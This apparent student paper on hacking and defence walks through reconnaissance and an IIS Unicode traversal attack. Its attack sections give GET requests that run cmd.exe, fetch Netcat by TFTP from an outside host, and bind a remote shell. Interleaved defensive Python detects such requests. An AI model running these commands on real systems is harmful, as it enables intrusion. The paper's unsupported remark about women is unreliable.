Guerndt, Dan - Internet Security and Hacking


  • 7/28/2019 Guerndt, Dan - Internet Security and Hacking


    Internet Security and Hacking

    Daniel Guerndt

    Department of Computer Science

    University of Wisconsin [email protected]

    Abstract

    Companies lose millions of dollars due to bad security practices. More and more users are using the Internet every day, and a very small percentage of them know how to defend themselves. It is important to understand how hackers get into systems in order to beat them at their own game. By knowing the tools and tricks of the trade that hackers use, one is better able to defend against an attack. This paper will also talk about a standard attack plan that most attackers follow, defensive programs, how to maximize security, and also how the law punishes convicted offenders of hacking.

    Introduction

    A hacker is a Database Administrator's (DBA's) worst nightmare. A company could go bankrupt or lose millions of dollars due to bad security practices. Whether there are multiple attackers or just a single attacker, the company is totally dependent on the DBA. Some Database Administrators would prefer going into a heavy military war zone to having to defend against an attack [1]. A patient hacker has an unlimited amount of time and resources to try and crack the case.

    Types of Attackers

    There are three types of attackers, arranged in the form of a pyramid [2]. On the bottom portion of the pyramid are what are known as Script Kiddies. They have limited knowledge of computer technology and programming. A Script Kiddy simply acquires scripts found on the Internet and deploys them. In general, they fire off random scripts until something works. They do tend to get caught more frequently due to their lack of knowledge; however, they still pose a dramatic threat to organizations. In the middle of the pyramid is the IT-savvy person. These people understand how to use programming and scripting languages. They also understand vulnerabilities, but in most cases cannot find new ones. They are also intelligent enough to use exploit code and tools with precision. At the top of the pyramid is the cream of the crop. These people have the IQs to boil water. They have the ability to find new vulnerabilities and to write exploit code and tools. Thankfully, the people at the top of the pyramid are limited in number. However, they cause the most problems, not only because of their intelligence level, but also because of their general willingness to give out the tools they have made to the public.

    The Smart Hacker

    A smart hacker is a company's worst nightmare. Do not be fooled into thinking that an attack is not planned. Considering the amount of time an attacker could spend in jail for an assault on an organization, smart hackers come up with elaborate plans. They also have the virtue of patience to an extreme degree. A smart hacker knows that traps are occasionally set up as defensive measures and that the most obvious point of entry could end up being the demise of the hacker. They do extensive research on their target, or targets, before unleashing any form of attack.

    An attacker's main enemy is the target's System Administrator. A System Administrator is in charge of the security of the system. He or she may have others also involved, but the responsibility is on the admin. Suppose the attacker finds out, through research, that the System Administrator is going on a faraway vacation for two weeks. If no one else understands the System Administrator's job, or the security measures set up, the attacker has two full weeks to get access. Even if something goes wrong for the attacker, he or she has a lot of time to get to the root of a system. Once an attacker gets system access, it's all over, because the attacker can hide his tracks easily from there on. In essence, the attacker is the new unauthorized admin, because even the System Administrator cannot find any trails or evidence of the assault.

    After getting in, a smart hacker will also wait a few weeks for the system administrator to back up the system [3]. This way, if his presence is ever discovered, the attacker is still present in the old backup that would be used for recovery.

    Information a hacker needs

    A hacker needs, first and foremost, information. The first piece of information an attacker would want is the target's domain name. If his or her target has a website, that is almost always the first point of research. If the target's website is unknown to the attacker, then he or she would probably search using a whois database. An attacker would want to know the name of the System Administrator or Database Administrator. After obtaining this information, the attacker can probably find out what hours the admin works. He or she would also want to know the operating system of the network and its version number. Every operating system has different vulnerabilities [2]. Without knowing which operating system the network is running, it can be nearly impossible to use vulnerabilities. Version numbers are also very important because some patches kill off old vulnerabilities. If the attacker wants to get access to a database, he or she would also need to find out the type of database being run as well as its version number. Another item an attacker needs is at least one IP address. After obtaining one IP address, the attacker can run a stealth scan of the network. This stealth scan will provide the attacker with the rest of the IP addresses of the network, all of the open ports on each terminal, and other things, depending on the scanner.

    Tools a hacker needs

    A hacker also needs tools. All of the tools can be found on the Internet. One of the tools needed for an attack is a way to scan open ports. Every book I've used came up with two main programs. The first is Netcat. In the hacker community, Netcat is known as the Swiss army knife of hacker tools because it has many different features [2]. Netcat is a featured networking utility which reads and writes data across network connections using the TCP/IP protocol (http://netcat.sourceforge.net/). It's a reliable back-end tool that can be used directly or easily driven by other programs and scripts.

    Another program that is widely used is Nmap (http://www.insecure.org/nmap/index.html). Nmap is probably the best stand-alone stealthy port-scanning tool out there. It is considered stealthy because it does not need to fully establish a TCP connection [4]. The program sends a SYN, and as soon as it receives an ACK, it terminates the connection [4]. All that's needed to use it is an IP address or website. Depending on the parameters entered, Nmap can list all IP addresses on a network as well as a list of open ports on each terminal. It also has other features such as detecting the operating system, the version number of the operating system, and even IDS and firewall information. However, an attacker will usually only use Nmap for port scanning because everything else is fairly easy to detect. Since these port-scanning tools do not give the operating system and/or database information in a stealthy manner, attackers will often consult whois databases.

    Whois Databases

    In just about every case, an attacker will consult these databases for the basic research they need to get started. Whois queries provide a hacker with the majority of the information that hackers need to begin their attacks [2]. There are four main types of queries: registrar, domain, network, and point of contact [2].

    A great place to find registrar information is http://www.internic.net/whois.html. A target often has several registrars. Internic.net has a rather large listing of associated registrar information. An attacker must determine the correct registrar so that he or she can submit detailed queries to the correct database in subsequent steps [2]. Once the correct registrar is found, a domain query is the next best approach.

    A domain query will often provide the name of the registrant, the domain name, the administrative contact, when the record was created and updated, and the primary and secondary DNS servers [2]. This query can also be made at the same site used for registrar information.

    A network query covers the specific network blocks that an organization owns. The American Registry for Internet Numbers (ARIN) is a popular database that can be used to determine networks associated with a target domain [2]. The web page for this database is http://www.arin.net.

    The ARIN database can also be used for point of contact (POC) queries. If an email address is provided in the domain query, it can be used to find more information by searching the ARIN database using the email address directly. Sometimes after doing this, an attacker will find more domains that the attacker did not know about [2].

    Social Engineering

    An attacker often requires help from inside organizations. An attacker's main goal in using social engineering is to act as if he belongs. By gaining the trust of individuals, he or she may not even have to do any hacking. An old epidemic that happened several years ago was the I LOVE YOU virus, which attached itself to emails and then mass-mailed itself using a target's address book. The reason this virus had such an impact was its subject line. A lot of people that were not IT savvy couldn't resist finding out who loved them so much [1]. This example did not involve hacking; however, hackers can use the same ploys to trick people into doing what they want. If an attacker were extremely dedicated to cracking the case of some company, perhaps he or she would go to the headquarters. A perfect demonstration of an attacker arriving at a headquarters is in the following example [3]:

    After arriving at the target location, the social engineer strikes up small talk with another employee as they walk toward the building. When they arrive at the locked door, the social engineer will pat down his coat pockets, looking for his key or pass card. In such a case, most anyone will do the other guy a favor and let him in with their key. Far from playing the part of the nervous interloper, the social engineer will enter the premises with calm confidence, pretending he truly belongs where he is. All the while, he will move about in a totally unassuming manner, obliquely acknowledging others going about his job. All the while, he will make a point of not attracting attention to himself, unobtrusively scooping the surroundings for tidbits of information that will aid him in his goal. The main systems are typically easy to locate as they are invariably showcased behind large glass walls. The OS of the systems running inside the network will be painfully obvious by the unattended monitors, which display the user interface and even the OS version number. The presence of Sun MicroSystems Sparc hardware in the computer room narrows the OS possibly down to Solaris or RedHat Linux. The toy penguins in the lead developer's office are sufficient clue that Linux is widely used. A stroll through the cubicles leads to the discovery of a number of Post-It notes near (or even on) a monitor that reveal a user's current login and password combination.

    The example above may be a bit extreme; however, everything it states is quite possible with social engineering skills.

    Another issue in social engineering is women. A lot of men don't think of women as IT savvy and will give out more information to them because the men don't think the women can do any damage with it [3].

    First step into breaking a system

    This step is actually composed of two parts, but the first part is quite simple. The first thing that is required is to find the target's website [3]. Doing a simple Google search on the target's name will often provide an attacker with the desired results. The second part of this step requires the attacker to run some sort of port scanner [3]. In an example used in Hack Proofing Your Web Applications, they used nslookup in a command prompt. However, Nmap, Netcat or a variety of other programs could have been used. Nslookup can be downloaded and run in just about any command prompt or used directly at http://www.kloth.net/services/nslookup.php. It mainly just returns an IP address and the domain name, but more information on nslookup can be found on the web. Here is an example of using nslookup [3]:

    $ nslookup www.targetsite.com
    Server: localhost
    Address: 127.0.0.1

    Non-authoritative answer:
    Name: www.targetsite.com
    Address: 208.37.215.233

    Second step into breaking a system

    Next we need the rest of the target network's IP address range. One thing an attacker might do is consult the ARIN database using the address received in the previous step. Otherwise an attacker might use Nmap's stealth detection to get every IP address with open ports available. Using the ARIN database would provide the attacker with every IP address allocated to the target. Nmap will not display an IP address that does not have any open ports, so using both methods is generally preferable. Here is an example using the ARIN database and Nmap [3]:

    $ whois -h whois.arin.net 208.37.215.233
    Treachery Unlimited (NETBLK-TREACHERY-COM)
    208.37.215.0 - 208.37.215.255

    $ nmap -sP 208.37.215.0/24
    Interesting ports on [208.37.215.233]
    [The 1529 ports scanned but not shown below are in state: closed]
    Port     State   Service
    21/tcp   open    ftp
    22/tcp   open    ssh
    23/tcp   open    telnet
    79/tcp   open    finger
    80/tcp   open    http
    143/tcp  open    imap2
    Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds

    From the Nmap results, there are a lot of possible vulnerabilities from all the different services listed. One of the easiest to try things out on is telnet, which will be used in the steps below. If there are vulnerabilities in the services listed by Nmap, chances are pretty good that a hacker can get access. This Nmap result is actually quite small as well, since it scanned 256 IP addresses. However, even one terminal with multiple open ports can lead to serious issues.
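    The same Nmap table, read from the defender's side: the script below is an added example (not from the paper or from the Nmap project) that parses output in the layout quoted above into an inventory of open ports and compares it against the short list of services a firewall is meant to expose. The sample text is constructed for this example and uses an RFC 5737 documentation address rather than the paper's host; the service-to-reason table is an assumption about what a reviewer would flag.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout of the Nmap output quoted above. The host
# is an RFC 5737 documentation address, not the paper's or any real target.
SAMPLE_NMAP = """\
Interesting ports on [192.0.2.233]
[The 1529 ports scanned but not shown below are in state: closed]
Port      State   Service
21/tcp    open    ftp
22/tcp    open    ssh
23/tcp    open    telnet
79/tcp    open    finger
80/tcp    open    http
143/tcp   open    imap2
Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds
"""


@dataclass(frozen=True)
class OpenPort:
    host: str
    port: int
    proto: str
    service: str


HOST_RE = re.compile(r"^Interesting ports on [\[(]?([\d.]+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")

# Why a defender would object to seeing these services reachable from the
# Internet (assumed reviewer's table); anything else not on the allow-list
# is reported generically.
LEGACY_SERVICES = {
    "telnet": "cleartext login",
    "ftp": "cleartext login",
    "finger": "user enumeration",
    "imap2": "cleartext mail login unless TLS is enforced",
}


def parse_nmap(text: str) -> list:
    """Turn Nmap's text table into OpenPort records (open ports only)."""
    host, ports = None, []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host is not None and m.group(3) == "open":
            ports.append(OpenPort(host, int(m.group(1)), m.group(2), m.group(4)))
    return ports


def review_exposure(ports: list, allowed=frozenset({"http", "https"})) -> list:
    """Compare the inventory with the services the firewall is meant to expose;
    returns (host, port, service, reason) for every surplus service."""
    findings = []
    for p in ports:
        if p.service in allowed:
            continue
        reason = LEGACY_SERVICES.get(p.service, "not on the public allow-list")
        findings.append((p.host, p.port, p.service, reason))
    return findings


if __name__ == "__main__":
    for finding in review_exposure(parse_nmap(SAMPLE_NMAP)):
        print("%s:%d %s (%s)" % finding)
```

    Run against the paper's example host, everything except port 80 is reported; tightening `allowed` to what the site actually publishes turns the scan into the "fewer open ports" check the defense section asks for.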

    Third step into breaking a system

    Most web servers are designed to provide their HTTP version and operating system [3]. To get the operating system, we can use telnet and perform an HTTP HEAD request [3]. Here is an example of an attacker using Telnet to his or her advantage [3]:

    $ telnet 208.37.215.233 80
    Trying 208.37.215.233...
    Connected to 208.37.215.233.
    Escape character is '^]'.
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Fri, 16 Feb 2001 18:45:23 GMT
    Content-Length: 526
    Content-Type: text/html
    Connection closed by foreign host.

    From the results, we find out that the target system uses Microsoft-IIS version 4.0, which has several known vulnerabilities listed on the Internet. It also tells us that the operating system is Windows NT. The only easy way to get into a system is by exploiting the vulnerabilities of systems. Windows NT has a lot of known vulnerabilities; however, users can often find patches to fix these vulnerabilities. Here are a couple of web pages that list known vulnerabilities: http://cve.mitre.org/cve, www.securityfocus.com, http://packetstorm.securify.com [3]. After checking for Windows NT and Microsoft IIS vulnerabilities, we find 400 known vulnerabilities dated since 1995 [3]. Since remote access is the safest approach, a smart attacker will use the safest vulnerabilities. As a rule of thumb, the latest vulnerabilities are often the least defended against [3].
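    Because the Server header is what gives the attacker the product and version in the step above, an administrator auditing their own hosts wants the same parse done mechanically. The block below is an added example, not code from the paper: it parses a raw HEAD response into a status code and a case-insensitive header map, then reports which headers disclose a product and whether a version number is included. The response bytes are a constructed sample shaped like the paper's output; the list of disclosing header names is an assumption.

```python
import re

# Constructed HEAD response shaped like the one quoted above; an assumed
# sample, not captured from any live host.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Date: Fri, 16 Feb 2001 18:45:23 GMT\r\n"
    b"Content-Length: 526\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)


def parse_head_response(raw: bytes):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased so lookups are case-insensitive; a
    malformed status line raises ValueError rather than guessing."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


# Headers that routinely carry product and version strings (assumed list).
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
VERSION_RE = re.compile(r"\d+\.\d+")


def banner_findings(headers: dict) -> list:
    """Report each disclosing header and whether it leaks a version number."""
    findings = []
    for name in DISCLOSING_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        detail = ("product and version disclosed" if VERSION_RE.search(value)
                  else "product disclosed")
        findings.append((name, value, detail))
    return findings


if __name__ == "__main__":
    status, hdrs = parse_head_response(SAMPLE_RESPONSE)
    print(status, banner_findings(hdrs))
```

    The findings list is empty only when none of the listed headers is present, which is the state a reverse proxy or server configuration that strips the banner should leave the host in; a bare product name without a version is still reported, since it is enough to narrow down the vulnerability lists the paper mentions.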

    Fourth step into breaking a system

    After finding out a few vulnerabilities that should work, we can use telnet again to try one of them. One of Windows NT's known vulnerabilities is from its handling of Unicode. The Unicode bug tricks the system into executing its command controller, cmd.exe [3]. Here is an example of using this known exploit, which tries to write to a file on the system [3]:

    $ telnet 208.37.215.233 80
    Trying 208.37.215.233...
    Connected to 208.37.215.233.
    Escape character is '^]'.
    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Fri, 16 Feb 2001 19:20:32 GMT
    Content-Length: 0
    Content-Type: text/plain
    Connection closed by foreign host.

    This attempt appears to be successful, but to make sure it worked, we need to try and read the file we attempted to write on the server [3]. If successful, we will be able to read and write on the given server. This will allow us to do just about anything we want to compromise the system. To test the results, use the following GET command after opening another Telnet connection [3]:

    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg

    If the result shows "test message", which is the content written to the file created earlier, it was successful. This pretty much allows the attacker to do anything he or she wants [3]. To issue the full-scale attack, the attacker needs a few tools to get the job done. A rootkit is needed to hide the attacker's tracks [3]. Rootkits can be downloaded and used from many different sites on the Internet. The correct rootkit must be downloaded based on the operating system, or whatever attack is being done. Another necessary item is a way to bind a specified port on the target system in order to log in directly [3]. The program used in this example is Netcat. With these two tools, the attack can be issued.

    The Attack

    The attacker needs a way to download the rootkit and Netcat onto the target system. Since Windows NT does not support passive FTP, the attacker must use TFTP (Trivial File Transfer Protocol). In order to use TFTP, the attacker issues the following GET [3]:

    GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe

    The attacker then downloads Netcat and the rootkit using TFTP. This can be done by using two separate GETs for the files, replacing nc.exe with the file names of the rootkit and Netcat [3]. After the items are downloaded onto the server, the attacker must issue a Netcat command to bind a port for the attacker's use. Here is an example of using the GET command to bind a port using Netcat [3]:

    GET /scripts/.%c1%9c../winnt/system32/cmd.exe?/c+nc.exe-1+-p+100+-t+-e+cmd.exe

    The port cannot be an open port already in use by the system, so for this example port 100 is used. After this step, the attacker issues one final command to get system access [3]:

    $ telnet 208.37.215.233 100
    Trying 208.37.215.233...
    Connected to 208.37.215.233.
    Escape character is '^]'.

    C:\winnt\system32\>

    This whole process may seem a bit complicated, but these vulnerabilities are clearly listed on the Internet. They sometimes show a step-by-step process just like the one I have gone through. After the attacker has system access, he or she would install the rootkit to hide everything that has just happened from the System Administrator.

    Defending against attacks

    The best defense against an attack is patching. Vendors will fix known vulnerabilities as soon as they hear about them. A System Administrator should look for these patches on a daily basis. If an attacker cannot find a vulnerability on a system, it is considerably harder to hack into it.

    Firewalls are also necessary. The fewer ports open to the public, the smaller the chance that a known vulnerability can be used. However, firewalls also have known vulnerabilities [3], so firewall information must be kept confidential.

    A company's website must also not reveal any incriminating information. None of the information needed to hack a site should be on its website. Also be careful what information is released to Whois databases [3]. If the attacker cannot find out who the System Administrator is, he or she could run into problems. If an attacker cannot find the needed information, he or she will often give up, unless dedicated to the attack.

    Companies also need to be careful about what is displayed at their company site. Having little toy penguins hanging around in offices does not help security. Displaying server information to the public is also a bad idea. Companies may want to lock down the server rooms completely and remove sticker labels from hardware. Only let trusted individuals into the server room.

    Another useful tool is an intrusion detection system (IDS). These find bad traffic, but do not necessarily stop it [1]. They continuously monitor the network for abnormal conditions, both internally and externally, and provide another security level [1]. IDSs can be completely passive and therefore not directly detectable by an attacker [1]. There are a lot of free IDSs available to the public; however, paying for one is probably the best approach since attackers have less access to them.
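    What an IDS (or a nightly pass over the web server logs) actually looks for in the attack walked through in the fourth step and "The Attack" sections above is a small set of signals: a percent-encoded byte sequence that is not valid UTF-8 but decodes to a path separator, a `..` escape out of the script directory, a request that names the command interpreter, and a query that invokes a file-transfer tool. The block below is an added example, not the paper's or any IDS product's code. The log lines are constructed in a simplified W3C-style layout and mirror the paper's requests with made-up client addresses; the `%c0%af` pattern, the interpreter and transfer-tool token lists, and the log field order are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, unquote_to_bytes

# Constructed log lines in a simplified W3C-style layout:
#   date time client-ip method uri-stem uri-query status
# The requests mirror the ones quoted in the paper; client addresses are
# made up for this example.
SAMPLE_LOG = """\
2001-02-16 18:45:23 10.0.0.5 HEAD / - 200
2001-02-16 19:20:32 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+test+message+>+test.msg 200
2001-02-16 19:21:10 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+type+test.msg 200
2001-02-16 19:25:00 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+GET+nc.exe 200
2001-02-16 19:30:00 10.0.0.9 GET /index.html - 200
2001-02-16 19:31:00 10.0.0.9 GET /scripts/report.asp id=42 200
"""

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<client>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

# Invalid (overlong) UTF-8 sequences that a lenient decoder may accept as a
# path separator. %c1%9c is the form quoted in the paper; %c0%af is the
# corresponding overlong '/' (added here as an assumption, not from the paper).
OVERLONG_SEPARATORS = (b"\xc1\x9c", b"\xc0\xaf")
INTERPRETERS = ("cmd.exe", "command.com", "/system32/", "\\system32\\")
TRANSFER_TOOLS = ("tftp", "nc.exe")


def analyze_request(stem: str, query: str) -> list:
    """Return the reasons (possibly none) a request looks like the traversal
    and command-execution pattern described above."""
    reasons = []
    raw = unquote_to_bytes(stem)                # decode once, keep raw bytes
    if any(seq in raw for seq in OVERLONG_SEPARATORS):
        reasons.append("overlong-utf8-separator")
    path = raw.decode("iso-8859-1").lower()     # byte-preserving, never raises
    if ".." in path:
        reasons.append("dot-dot-traversal")
    if any(tok in path for tok in INTERPRETERS):
        reasons.append("command-interpreter")
    args = unquote_plus(query).lower() if query != "-" else ""
    if any(tok in args for tok in TRANSFER_TOOLS):
        reasons.append("tool-transfer")
    return reasons


def scan_log(text: str) -> tuple:
    """Run analyze_request over every line. Returns (findings, unparsed_count);
    unparsable lines are counted rather than dropped so a malformed line
    cannot silently hide a request."""
    findings, unparsed = [], 0
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        reasons = analyze_request(m["stem"], m["query"])
        if reasons:
            findings.append({"client": m["client"], "time": m["time"],
                             "stem": m["stem"], "status": int(m["status"]),
                             "reasons": reasons})
    return findings, unparsed


def count_by_client(findings: list) -> Counter:
    """Hits per source address, the first thing an analyst wants to see."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    hits, bad = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["status"], ", ".join(h["reasons"]))
    print("unparsed lines:", bad, "| per client:", dict(count_by_client(hits)))
```

    Matching on the raw bytes before any decoding is the point: a signature that first decodes the URI to text would see a harmless-looking `\` and miss exactly the encoding the paper's request depends on. A 200 status on a flagged request is the difference between an attempt and a success, which is why the status is kept in each finding.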

    70% of all attacks come from trusted employees [3]. Employees occasionally become disgruntled and think they can get away with anything. In some cases this is true, but there should be several internal security measures set up. All code must be documented properly. If a programmer quits an organization and the code worked on is not documented properly, they may have left malicious code hidden inside. This can require the company to do a full-scale safety check of the software, costing time and money. However, with proper documentation and organization, it's much easier to find such obstacles.

    A System Administrator could also set up an easy entry point intended to draw hackers in. A trap like this, if properly set up, will get flagged immediately and hopefully some information about the hacker is left behind.

    Law and Hacking

    An unwanted intrusion into a system is regarded as an extreme offense. It is often considered a felony. If convicted, the accused hacker can face many years in jail and huge fines. The charge is based on how much damage the hacker did against a company, the attacker's age, the target, etc. If the hacker caused enough damage, the attacker should expect to stay in jail for more than five years, with up to a $250,000 fine.

    Another thing to take note of before running off and starting to hack is having the felony label over one's head. A convicted offender would have an extremely hard time getting near a computer, or an IT job.

    Conclusion

    There are many types of hackers out there, all of whom are dangerous. To successfully penetrate a system, an attacker needs tools and information. There is nothing you can do to stop hacking tools from being spread around, but you can protect yourself from an invasion by hiding information. Anything is penetrable, no matter how secure. However, the more secure a network is, the harder it is to crack.

    Not all hacking is done over the Internet. Be wary of disgruntled employees and social engineering ploys. Disgruntled employees do the majority of all attacks.

    The best way to protect a network from invasion is by getting the latest patches from vendors. This in itself will cancel out hundreds of known vulnerabilities and make a system, or network, much safer.

    References

    [1] Ahmad, David R. Mirza; Russell, Ryan. Hack Proofing Your Network. Rockland: Syngress Publishing, Inc., 2002.

    [2] McClure, Stuart; Scambray, Joel; Kurtz, George. Hacking Exposed: Network Security Secrets & Solutions. Fourth Edition. Berkeley: Nordin, 2003.

    [3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think Like One. Rockland: Syngress Publishing, Inc., 2001.

    [4] Chirillo, John. Hack Attacks Testing: How to Conduct Your Own Security Audit. Indianapolis: John Wiley & Sons, Inc., 2003.
